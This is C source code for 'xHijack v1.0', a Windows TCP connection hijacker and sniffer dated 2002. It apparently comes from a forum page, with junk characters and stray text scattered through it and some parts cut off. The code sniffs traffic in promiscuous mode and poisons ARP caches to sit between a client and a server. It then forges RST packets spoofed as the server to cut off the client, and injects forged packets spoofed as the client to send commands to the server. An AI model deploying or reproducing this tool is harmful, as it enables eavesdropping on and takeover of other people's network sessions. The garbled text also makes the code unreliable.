{2 m" q9 W- B6 d& u4 V1 b ULONG AdapterLength = 1024; int iAdapterNum = 0; int iRetCode, i; ' K, A& i! w' m* O/ r2 Z int iAdapter = 0; 4 U+ ]' f( G; W! V( r! P ULONG ulLen = 0; DWORD dwRet; PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; PIP_ADDR_STRING pIPAddr; //Get The list of Adapter , k! n1 u& e, l$ c if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) { ( V2 ~) k9 b. ^; d( u printf("Unable to retrieve the list of the adapters!\n"); 8 L7 ^$ T4 c( K/ l0 B2 o- t return 0; : M0 Y- F# ]. u. G2 V; N9 ^! A4 S } temp = temp1 = AdapterName; 5 s" q" w! B6 |0 v# \6 i i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) { " ^) s; R! M. J/ S if (*temp == '\0') { memcpy(AdapterList,temp1,(temp-temp1)*2); printf("%d - %S\n", i+1, AdapterList); 8 C2 D& d( l* l8 E temp1=temp+1; ' M. m, @( x* B- ~) p% H i++; } 1 s M- I* \8 M6 }: q1 Q" t temp++; , E$ g/ y9 y: e9 t+ U } //choose adapter while((iAdapter <= 0) || (iAdapter > i)) 8 E; a) c9 m* P: k1 E { . B; Z6 V$ T2 J( p printf("\nPlease choose your Adapter:"); scanf("%1d", &iAdapter); } 7 M% ~$ K" E) Y& ]+ \6 G printf("\n"); + I# S1 k0 B9 P //---------------------------------------------// ) o: }- A* h2 ^& r- e! v, w/ u) C //这里调用iphlpapi来取得本地ip_addr和mac_addr . _, Q% F4 h' C% f sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); 1 s0 O ], m2 e7 x) L" [, J, `& F dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); 5 M: _6 x( R: ]4 I1 \ if(dwRet != ERROR_BUFFER_OVERFLOW) { ' r1 V+ d% K/ Y& d$ q printf("GetAdapterInfo error:%d\n", GetLastError()); 9 X% C. l- h% |) X( y/ S4 X return 0; " j5 S) T0 T& f) L3 g/ `! S } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); if(!pAdapterInfo) : i( U+ ]6 m& B- ? { 3 ^- s' ]8 u: X" V printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); return 0; } $ b$ F0 i. \: y) s dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); 0 r( `5 ?) i. W* J0 W if(dwRet != ERROR_SUCCESS) , F7 A! u/ u4 K4 { { 6 z1 ]5 {" U q8 o& J- `% d* ?+ L. H. v# Z printf("GetAdapterInfo error:%d\n", GetLastError()); . T$ t# W/ }8 T3 p return 0; 6 X6 Z7 r* c& |; K7 R4 b } 1 P, J. Z. V5 C- R pTmp = pAdapterInfo; while(pTmp) { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) { 4 g9 S0 \) S! B- } //found it,get own adapter mac address memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address $ i3 \" X: \. B: M& y7 N pIPAddr = &pTmp->IpAddressList; while(pIPAddr) ; h' L: o- Q5 N' {* a { + u0 v( t; y, ]' f3 i' ?) X# n# p g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; 0 p- x5 v3 U) K3 [ if(g_TotalIP >= Max_Num_IPAddr) break; 3 `7 ^# R: ]! _- O/ ^, [' i$ h } break; 2 z' b4 Y. ~3 i; ~( }6 B% Z* s } pTmp = pTmp->Next; } : w8 R1 x- u0 J! f ^' O( q free(pAdapterInfo); //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; 5 i4 o) n3 M: r4 Z. Q; X //---------------------------------------------// //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) ( Q5 I! e! N M8 D { iRetCode = GetLastError(); 5 Y, N$ ? B# \: k* [/ I% @# c% i) U% l printf("Unable to open the driver, Error Code : %lx\n", iRetCode); return 0; ' f* v0 f* r- k; Y4 l2 o- R } // set the network adapter in promiscuous mod $ ~% f5 c! M2 V: D* @! T1 f if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) { + b& V& n e2 d$ p* I! g printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); 1 M6 N% W1 n0 L if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) % }2 z( I% W! Q' w { printf("Unable to set ALL_LOCAL mode!\n"); 6 P, F9 ` a! [; X# A c+ w return 0; # D" s. n$ f5 X1 z } } " S; ~- L( U( `$ e // set a 512K buffer in the driver + M) U/ @' V+ v6 ~# ^; g if(PacketSetBuff(lpAdapter, 512000) == FALSE) ( G! `5 e# e6 N( C* g1 y1 _* ]& N { 8 E' ]% o7 y! ]# U4 z4 P printf("Unable to set the kernel buffer!\n"); return 0; ; ]1 r( z& V2 a4 \) k } // set a 1 second read timeout 8 a2 p. q# O/ Q$ j% F5 N if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) + l) ?8 ]. d7 f2 v9 j: \ printf("warning: Unable to send more than one packet in a single write!\n"); : @" D7 P# Q" S6 f //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); if(g_lpSendPacket == NULL) { ) s5 N) Q# p$ F& _' M' P printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; # E/ r8 R8 |( e6 z* D" ~ } ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } //功能：帮助信息 void usage() , G. G; v) {7 h ]( e8 E4 B; S{ 2 l# s% B! z7 i9 v4 P: b- X) c- a printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" / J+ ^, N$ p. N "By eyas 2002/8/19\n" ( k6 J: R. j! X "http://www.ey4s.org\n" , O% K$ ?( |5 M# p/ a5 z. ?: J "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); - C% G Z3 \# N6 D1 F6 z} + q% j. ]4 L* |, O! G // //功能：显示数据包的一些详细信息 . q+ |$ J, O5 a5 G5 K4 y// VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) 9 i1 T1 H( P I" g2 f. z{ - A. F( ]& {4 b& n% F; O SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; int i; ' F: e) G t# x& [ l saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; 2 r) M5 e S1 Q! k6 I0 }( _* d saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); ( P, a4 Q/ I$ E+ Y" ]9 C' o6 y+ x+ J printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), 5 |" h4 O9 A3 D" I; q r ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); , ?' A. K6 y6 e4 l/ _9 g //display TCP flag 9 K) H$ R: W- O B+ G; j for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) { if((pTCPPacket->tcphdr.th_flag) & FlagMask) ' @. C6 d+ Z9 m! ` printf("%c", g_szTcpFlag); else printf("-"); $ m6 @% Y4 s2 }& o5 v2 X } printf("\n"); //如有需要，可显示更多详细的信息 if(bDetail) 5 s! t( F1 Q4 g! [, B- n3 @/ J% W printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); } // //功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 $ M; r, @. L$ ]8 B' p) Y2 G, I- q& S9 i4 N// * T/ y& ~( p* q* f3 c1 x: z% i& J1 eDWORD WINAPI AnalysePacketsThread(LPVOID lp) { 5 v* Q& d' g( ]+ F1 M ULONG ulBytesReceived; % _* `& K6 r/ d3 P USHORT usDataLen; ' F/ q8 J9 M- P: { @ //USHORT usIPHeadLen, usTCPHeadLen; char *buf; ) E7 ~! {; W) v5 L u_int off, i; 7 E; V" E7 y. q+ I' r; } PTCPPACKET pTCPPacket; % k+ s3 o1 S- V3 k( g. P; e. M+ g struct bpf_hdr *hdr; LPPACKET lpRecvPacket; char szPacketBuf[256000], *pStr; : r; {; \) M {8 @% x' U BOOL bDeleteNode, bAddNew; DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 . ^$ V; Y+ x1 ~ BOOL bClientToServer;//数据包是否从客户端发送到服务器端 //设置接收的packet lpRecvPacket = PacketAllocatePacket(); " u0 C ]% K+ E$ T if(lpRecvPacket == NULL) $ v6 W3 Z5 {% B6 t { printf("Error:failed to allocate the LPPACKET structure for recv.\n"); return 0; } . ~) _* Q2 b+ c* u) v E; h ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) / A. D: a0 g* c- w { + o& p$ a' v4 w0 V* Y- V" ` // capture the packets if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) ; X: h- D& u' m4 H! j { printf("Error: PacketReceivePacket failed.\n"); break; } ulBytesReceived = lpRecvPacket->ulBytesReceived; ; B9 @, R* p/ r1 K( V: U buf = lpRecvPacket->Buffer; / y( Z; D: ?! _. P off = 0; while(off < ulBytesReceived) / R y# L% u J$ e/ Q! X { 8 z/ V& H1 D* T+ Z! J hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); $ c9 T/ q% u: n off = Packet_WORDALIGN(off + hdr->bh_caplen); 6 g# l9 ]3 x; c! t5 h! ]3 {7 I //不需要处理自己发出的包(转发或本机发送的) 2 H, ~( G9 I; z& b; F if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; //也不处理DestIP是自己的包 ( y+ b$ J$ |! r5 G8 i$ q6 P6 \, A for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
          }
, e2 z2 U% O6 c# c1 h; L9 B0 h          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
/ X1 ]# P1 c( I8 \3 W# x/ x' ~6 @/ r          {
            //send rst packet to client
: I' }. O. f$ M! Q            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
& t, J6 Q$ n+ ^% A; g            //send hijack packet to client
            SendHiJackPacket(pTCPPacket);
7 w* s8 X+ A' k' M            //reset action flag
            ResetActionAllFlag();
          }
1 K/ |8 r- l2 v" {" e5 e; o% _        }
  b. x  b- c$ h1 W" D        //show the tcp data
' a# \% `1 U  E! n        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
6 @5 t; e) f8 v1 i- d: d; W  h" v          //暂不考虑IP、TCP头不是20字节的情况
) G7 l7 A/ v3 x- T* l: ?5 J          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
! k5 x3 T  t; x% y( H          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
: r  E* l/ M4 r& {! {      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
" W# Q! q3 e+ f  ?  e; E    }//end of analyse packets while
  }//end of recv packets while
3 _" O$ A5 G" w2 O+ I  PacketFreePacket(lpRecvPacket);
  return 0;
9 H: i$ _* |) g% G}


//
//功能：操作记录所有连接信息的单向链表
: m) H! m0 @, C4 N//
DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
" j7 e# f" U0 ?8 }{
  PCONNINFO  pNew, pTmp;

. @, g$ a* h' K8 P  pTmp = g_pConnHead;
$ ~9 L8 v3 q, R3 Y( l3 x  while(pTmp)
2 d6 Y3 c( n& A% r" ~  {
    if(pTmp-&gt;bActive)
5 R( I+ [. s. V6 d( k0 |, [    {
0 X: d# P& _& V0 }# M; h1 \7 n      //found it
0 T, k, q1 h9 T6 K      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
0 z  q" @/ x6 l  s2 B1 l2 N  H1 n: S        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
        (pTmp-&gt;uClientPort == uClientPort) )
      {
$ K$ t- T! s2 |' k        if(bDelete)
& u6 ~& j3 S9 @* X+ X        {
          pTmp-&gt;bActive = FALSE;
6 x- h- B* j$ Z" ?+ R" D          return 0;
        }
        else return pTmp-&gt;ident;
      }
    }
9 j: }1 W* S  d* y2 i    pTmp = pTmp-&gt;Next;
, y4 Y/ S6 W8 R1 W& j( B! Q- M# Q! Y  }
' |' m8 M0 `2 a) ^/ v0 ~  //not found, create new node
' X$ D2 w* y% a# \! x* ^  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
    //search unactive note
, j) N! P( D- C1 H    pTmp = g_pConnHead;
- c3 N+ \6 \& E# ~    while(pTmp)
5 ~$ I) I1 y' {4 Q, j" Z% H    {
, ^  A, M1 O$ |% Q      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
) R! ^  n' Y$ X, U  W( [  s, ~    }
    //found a unactive node
    if(pTmp)
, N: \; ~0 e9 B* G& |% C    {
, K' U/ P. ^7 i- ~0 ]1 U1 b      pTmp-&gt;dwServerIP = dwServerIP;
& `: I+ a& c, b" i% X$ a      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
4 k; d/ P5 X$ I      pTmp-&gt;uClientPort = uClientPort;
4 Z8 I. `, u% d- Y7 b      pTmp-&gt;bActive = TRUE;
      return pTmp-&gt;ident;
    }
4 X- A- n) s( {7 s3 m% |    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
, B; F6 V8 ?7 O9 f0 o: [2 \      printf("malloc for link node error:%d\n", GetLastError());
( ?! v5 c! {- V; j7 h3 ^- A      return 0;
8 o5 D" `6 F& u/ \: G4 i  f    }
    //fill the struct
    pNew-&gt;bActive = TRUE;
    pNew-&gt;dwServerIP = dwServerIP;
8 {" `1 s" W( T) _; b! C    pNew-&gt;uServerPort = uServerPort;
$ e' b0 p% a) V( x    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
    //add new node to link
6 f) E8 C. z) i, ~0 F' J( O    if(!g_pConnHead)
' A3 @  T3 j9 }. [  A2 j      g_pConnHead = g_pConnLast = pNew;
    else
" |1 O: Z' j0 r& l" [5 `  c4 d    {
      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
& t% J- Z1 C0 T. N  J2 z7 x    }
$ D- Z& S7 V8 P5 T" l" h1 _# |* R    return pNew-&gt;ident;
1 l: P. h( A8 a0 V+ H  }
+ y) I; K- t* {. n$ W5 Y  return 0;
, e+ Q9 Z1 [0 ]0 Y' B# }}

8 I7 o+ Z; z  B+ `! n+ d//
% Z. v( u9 T( j% J3 C//功能：判断一个数据包是不是只有ACK标志
//
, v/ J% Q7 _. ^3 l3 a8 L2 kBOOL IsACKPacket(unsigned char flag)
{
3 e" e, d- G# q* @  int  i, j=1;
  for(i=0 ; i&lt;4; i++)
  {
) z4 _$ F/ d' d7 B7 i6 _    if(flag &amp; j) return FALSE;
* v3 s0 l4 V) D( n    j &lt;&lt;= 1;
  }
% v' A9 x9 m/ E& c  if(!(flag &amp; 0x10)) return FALSE;//is ack?
  if(flag &amp; 0x20) return FALSE;
  return TRUE;
2 F4 L% b) I  `- g8 `+ x}

//
//功能：伪装成Client给Server发送数据包
+ F! P) L1 U+ y! p//
5 d8 \! V0 S( h$ ^BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
8 z0 @5 {' N( H  e. o{
- k5 {! ]1 k, N
$ C2 ?. f$ k4 |& t- F7 }  char    szBuff[1520];
4 w. e) `; X* J2 z9 X  PSDHDR    psdhdr;
1 ]! K# V* t+ A5 `& \0 L1 f. B  PTCPPACKET  pHiJackPacket = NULL;
+ T0 G; _& T  P  BOOL    bRet = FALSE;
) t- {5 P! H, M- n+ E
  __try
# m4 ^& ]& p' D9 U  {
    //
$ c) ~8 g7 t) p7 B    if(!g_pCurrCtrlConn) __leave;
5 }! z; Q8 ^5 Z    //allocate memory for hijack packet
' d( _) Q' i0 I2 j1 _    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pHiJackPacket)
# [- }% Y. J  U' \' g    {
, e+ c% F) x. J      printf("malloc error:%d\n", GetLastError());
  l* l/ o- t7 j/ u! o4 E2 J7 t      __leave;
    }
0 S6 U9 c. P  f/ r+ f! j    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
    //-------------- modify the packet ---------------//
    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
$ o/ p9 `: z  r7 p; f1 {9 A    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    //modify ip head
  K) b+ t* ~6 D" }& x# X6 W1 H  U    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
- Z$ N8 N; N& E; Q2 g8 N    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
# Y2 j2 r; r- F/ W  e" o% D    pHiJackPacket-&gt;iphdr.checksum = 0;
    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
    //modify tcp head
9 V# n# v4 s$ B1 o' U. z9 b; V    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
. y' e5 g' a0 f& [( q: H    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
4 K1 J. E3 m% T    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
    pHiJackPacket-&gt;tcphdr.th_sum = 0;
3 q8 u6 l4 W6 p* i5 W$ W3 D    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
# p1 e3 X  c  k9 L! a) s, U    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
( V4 e/ D2 o. K3 D9 Y    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
    //calculate IP checksum
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer           
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
2 Y' V/ `2 t+ `; W4 u/ A# X/ A    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
+ @; J1 n; @5 j; j9 M8 K    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
6 L" B6 {: u* ~3 f    {
% f) h1 {9 s( A( D( ]( E      printf("Error sending the hijack packets!\n");
      __leave;
; \6 q# w' Q+ t! ?2 q1 V( ?' E6 u    }
3 }( O- {" J6 y9 K% |& u3 O; [    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
  }

韩冰

__finally
$ G! U  A+ a4 t! C9 J2 {  {
    if(pHiJackPacket) free(pHiJackPacket);
  }
  return bRet;
}

% m9 w6 M' u: E: q1 Y0 d3 g' a
//
//功能：伪装成Server给Client发送rst包
//
; E! Z: h6 |2 Z. k/ C5 ]- nBOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
  char    szBuff[60];
4 i) s  ?/ Z' Z" X6 w  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;
2 k6 Y! `8 K; E3 z' i, a' V3 O: `
  __try
  {
; b8 A+ c1 Z) ^+ ~" L2 F2 k/ K    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
+ A; y2 @9 o3 B, A- E6 s    //allocate memory for rst packet
1 `8 _+ B% _; u- w. G. A    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
' u- k- E6 N/ Z; g3 b" \# ^    if(!pTcpPacket)
9 c4 e, b! J6 L9 a6 V    {
* a) D2 z, n& ?      printf("malloc error:%d\n", GetLastError());
+ i5 p2 b. ?: l( G! F7 ^( B      __leave;
- B$ g& U) [, e$ r  g1 {    }
3 |4 ~/ Z; Z. m0 m- t) A    //fill ethernet head
. K% ~3 C0 O/ M& Y9 v2 o+ Z2 O    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
2 b5 I% D% y; m! `- {/ t1 `/ o; [    //fil ip head
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
  _" w. S& b! u8 j$ U    pTcpPacket-&gt;iphdr.ident = 1;
    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
# c9 F. M8 K3 [3 k; Y2 ~8 e    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
; ~# K0 k5 Y0 @, y5 @) i3 }  o    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
    //fill tcp head
    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
' T) A' Q; Q. J6 k) U& e; k    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
0 F- \) h. V8 S, ?    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
    pTcpPacket-&gt;tcphdr.th_win = 0;
6 z  a& J# [+ B- K  f    pTcpPacket-&gt;tcphdr.th_urp = 0;
7 A  ~: |8 c; r" F! I2 V: Q* k  J    pTcpPacket-&gt;tcphdr.th_sum = 0;
0 O8 @7 E# F1 E% p1 q$ ^% \' U    //fill tcp psd head
    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
# ?8 Z1 ?. r0 J% |6 u8 W( c5 r5 b9 _+ F    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
9 k# u4 d+ O2 w; B0 O( W7 O    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
; e  i5 x* D5 X1 g! H5 Y    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
3 `  d0 l9 {" `    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
    //calculate IP checksum
3 z5 u& Z+ B3 E5 V    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer
# |6 r) R/ Z3 t    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
, [  W4 H5 h/ a9 Q    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
- ]8 d5 [0 G9 R9 R    {
7 Q1 ?& k4 _/ L      printf("Error sending the rst packets!\n");
7 R; ^+ e* ^/ X$ T  ]  N, f8 X/ J      __leave;
2 r0 l' p% J$ C- L& g    }
& P, y) \4 F, }; ~    else printf("Send RST packet ok!\n");
1 M3 u4 P- F* P/ u" t: P  m    bRet = TRUE;
6 I# O0 z) J# C6 C1 M0 X8 a& ]  }
5 |+ {  F" g! t+ v, @  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
: D* I* g2 `, h$ t: z* O  }
$ @& s; u# P8 ~; m2 Q6 N  return bRet;
}
  D) n/ O  K; i9 s7 K
+ f. F. X, H  A/ m7 [. |4 h7 i# M//
; V5 w: B8 \$ d- A//功能：计算校验和
: ?" ~' h0 M3 _+ ^//
' E2 N5 v" p. y' VUSHORT checksum(USHORT *buffer, int size)
! P8 M, C4 Q4 a- j; K& H+ m{
5 c) Q2 y- k4 D2 f% ^' x. q unsigned long cksum=0;
8 Z0 T. T% E! x. C# t while(size &gt;1) {
  cksum+=*buffer++;
  size -=sizeof(USHORT);
}
2 h% F5 S. C4 t% T if(size ) {
( `6 C( T3 l$ }; A! `, R& H8 F$ O* M+ D  cksum += *(UCHAR*)buffer;
4 ?5 ]5 d# x6 ~: ~) q3 I }
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
cksum += (cksum &gt;&gt;16);
+ q& h/ l5 P+ d5 k' ?7 R return (USHORT)(~cksum);
$ b4 L9 y- \3 b4 K2 E  T& ~}

6 J  P, T8 v, w2 ]$ V! G' a$ C//
//功能:实施ARP欺骗
/ q$ x8 B& ~- m2 ?6 l0 C5 G//1 告诉ServerSide,ClientSide的mac是ownmac
//2 告诉ClientSide,ServerSide的mac是ownmac
( B1 C* a; n2 q//
+ S* s6 L, x& N& T! wDWORD WINAPI ArpSpoofThread(LPVOID lpType)
{
  int  iType = *(int *)lpType;
) \* I/ Y7 p. l% n. M  ARPPACKET  ArpPacket;
! Y" m8 x& q. l( G  LPPACKET  lpArpPacket;
6 g$ U$ |1 ^" o& g+ U  char    szArpBuff[60];
* k$ J: H1 o9 ?1 z* w
0 u9 p7 }4 t9 `6 L) v  switch(iType)
! r5 |: f# m# U  D; ]- U  {
* E: D: g5 f  Q) m7 r    case 1:
8 x: P4 c4 X5 c- q; c9 s      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
4 ?0 e) ?/ T4 ~. l1 ?  t- p. \      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
6 @5 a5 }5 J$ _2 H# \) a8 c    case 2:
$ }" B7 `* ~* `" }! }7 i) U      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
  f7 E% @6 g3 E* ]4 U5 k      ArpPacket.arphdr.DestIP = g_ClientSideIP;
/ D- s' g2 w* p      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
    default:
7 A3 P& m5 [" @6 K4 X! u! S      return 0;
* w/ B9 A$ @+ ]0 ~+ d  }
  //ethernet head
4 I* ?. t" J* q+ B9 A/ Y/ B  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
: Z) d& x5 c% T" y2 `  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
+ O4 H) {' S; E  //arp head
' K9 }2 ?$ ]; F( }) V6 ]  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
